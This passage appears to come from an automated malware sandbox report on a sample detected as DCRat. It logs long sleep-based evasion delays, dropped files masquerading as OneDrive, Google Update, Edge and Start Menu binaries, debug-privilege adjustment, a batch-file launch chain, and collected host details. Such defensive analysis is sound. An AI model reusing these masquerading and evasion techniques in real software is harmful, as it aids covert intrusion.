                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598014Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597906Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597796Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597686Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597578Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597468Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597358Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597250Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597140Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597031Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596921Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596812Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596586Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596484Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596374Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596256Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596125Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596012Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595905Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595796Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595684Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595578Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595468Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595359Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595250Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595140Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595031Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 594921Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 594812Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 594703Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 594583Jump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeWindow / User API: threadDelayed 1994Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeWindow / User API: threadDelayed 7798Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\KjTCumlu.logJump to dropped file
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeDropped PE file which has not been started: C:\Users\user\Desktop\ALzNWdSZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe TID: 7580Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 7764Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -600000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599873s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599765s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599656s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599546s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599437s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599328s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599218s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -599109s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598999s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598890s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 4296Thread sleep time: -3600000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598781s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598671s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598562s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598453s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598343s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598234s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598125s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -598014s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597906s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597796s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597686s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597578s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597468s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597358s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597250s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597140s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -597031s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596921s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596812s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596586s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596484s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596374s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596256s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596125s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -596012s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595905s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595796s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595684s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595578s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595468s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595359s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595250s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595140s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -595031s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -594921s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -594812s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -594703s >= -30000sJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552Thread sleep time: -594583s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe TID: 7964Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe TID: 5816Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe TID: 2736Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe TID: 2200Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe TID: 2688Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\StartMenuExperienceHost.exe TID: 2800Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\StartMenuExperienceHost.exe TID: 2692Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\StartMenuExperienceHost.exe TID: 4020Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599873Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599765Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599656Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599546Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599437Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599328Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599218Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599109Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598999Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598890Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 3600000Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598781Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598671Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598562Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598453Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598343Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598234Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598125Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598014Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597906Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597796Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597686Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597578Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597468Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597358Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597250Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597140Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 597031Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596921Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596812Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596586Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596484Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596374Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596256Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596125Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 596012Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595905Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595796Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595684Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595578Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595468Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595359Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595250Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595140Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 595031Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 594921Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 594812Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 594703Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 594583Jump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: 0JLWNg4Sz1.exe, 00000000.00000002.1711950301.000000001C637000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4177598687.000000001AF90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess token adjusted: Debug
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess token adjusted: Debug
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess token adjusted: Debug
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat" Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\StartMenuExperienceHost.exe "C:\Recovery\StartMenuExperienceHost.exe"
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerH
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000029B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,"Unknown (Unknown)","Unknown (Unknown)","Program Manager","173.254.250.78","US / United States of America","Texas / Dallas"," /
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{},"5.0.1",5,1,"","user","965543","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\All Users\\Microsoft OneDrive\\setup","Unknown (Unknown)","Unknown (Unknown)","Program Manager","173.254.250.78","US / United States of America","Texas / Dallas"," / "]
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeQueries volume information: C:\Users\user\Desktop\0JLWNg4Sz1.exe VolumeInformationJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeQueries volume information: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe VolumeInformationJump to behavior
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeQueries volume information: C:\Users\user\Desktop\0JLWNg4Sz1.exe VolumeInformation
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeQueries volume information: C:\Users\user\Desktop\0JLWNg4Sz1.exe VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeQueries volume information: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeQueries volume information: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe VolumeInformation
                              Source: C:\Recovery\StartMenuExperienceHost.exeQueries volume information: C:\Recovery\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\Recovery\StartMenuExperienceHost.exeQueries volume information: C:\Recovery\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\Recovery\StartMenuExperienceHost.exeQueries volume information: C:\Recovery\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
